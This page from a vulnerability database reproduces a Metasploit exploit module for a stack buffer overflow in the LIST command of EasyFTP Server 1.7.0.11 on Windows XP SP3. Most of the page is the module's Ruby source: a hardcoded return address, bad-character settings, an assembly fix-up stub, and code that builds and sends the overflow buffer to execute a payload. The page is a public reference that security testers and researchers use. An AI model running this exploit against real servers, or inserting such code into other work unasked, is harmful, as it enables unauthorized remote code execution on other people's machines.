Vulners
Lucene search
EasyFTP Server LIST Command Stack Buffer Overflow
🗓️ 27 Jul 2010 02:25:15Reported by Karn Ganeshan <[email protected]>, MFR, jduck <[email protected]>Type 
metasploit🔗 www.rapid7.com👁 10 Views
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
##
# EDB-ID: 14400
# Date : July 5, 2010
# Discovered by : Karn Ganeshen
# Version : 1.7.0.11
# Tested on : Windows XP SP3 Version 2002
# MFR & VAS TEAM : just testing howto convert exploits to metasploit modules.
##
class MetasploitModule < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::Ftp
def initialize(info = {})
super(update_info(info,
'Name' => 'EasyFTP Server LIST Command Stack Buffer Overflow',
'Description' => %q{
This module exploits a stack-based buffer overflow in EasyFTP Server 1.7.0.11.
credit goes to Karn Ganeshan.
NOTE: Although, this is likely to exploit the same vulnerability as the
'easyftp_cwd_fixret' exploit, it uses a slightly different vector.
},
'Author' =>
[
'Karn Ganeshan <karnganeshan[at]gmail.com>', # original version
'MFR', # convert to metasploit format.
'jduck' # modified to use fix-up stub (works with bigger payloads)
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'OSVDB', '62134' ],
[ 'EDB', '14400' ],
[ 'EDB', '14451' ]
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread'
},
'Privileged' => false,
'Payload' =>
{
'Space' => 512,
'BadChars' => "\x00\x0a\x0d\x2f\x5c",
'DisableNops' => true
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows XP SP3 - Version 2002', { 'Ret' => 0x7e49732b } ], # call edi from user32.dll (v5.1.2600.5512)
],
'DisclosureDate' => '2010-07-05',
'DefaultTarget' => 0))
end
def check
connect
disconnect
if (banner =~ /BigFoolCat/)
return Exploit::CheckCode::Detected
end
Exploit::CheckCode::Safe
end
def exploit
connect_login
# NOTE:
# This exploit jumps to edi, which happens to point at a partial version of
# the 'buf' string in memory. The fixRet below fixes up the code stored on the
# stack and then jumps there to execute the payload. The value in esp is used
# with an offset for the fixup.
fixRet_asm = %q{
mov edi,esp
mov [edi], 0xfeedfed5
add edi, 0xfffffff4
mov byte ptr [edi], 0xc0
add edi,4
mov [edi], 0xdeadbeef
add edi, 0xffffff24
add esp, 0xfffffe04
jmp edi
}
fixRet = Metasm::Shellcode.assemble(Metasm::Ia32.new, fixRet_asm).encode_string
buf = ''
print_status("Prepending fixRet...")
buf << fixRet
buf << make_nops(0x30 - buf.length)
print_status("Adding the payload...")
buf << payload.encoded
# Patch the original stack data into the fixer stub
buf[4, 4] = buf[268 + 8, 4]
buf[16, 1] = buf[268-4, 1]
buf[22, 4] = buf[268, 4]
print_status("Overwriting part of the payload with target address...")
buf[268,4] = [target.ret].pack('V') # put return address @ 268 bytes
print_status("Sending exploit buffer...")
send_cmd( ['LIST', buf] , false)
handler
disconnect
end
end
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
02 Oct 2020 20:00Current
7.3High risk
Vulners AI Score7.3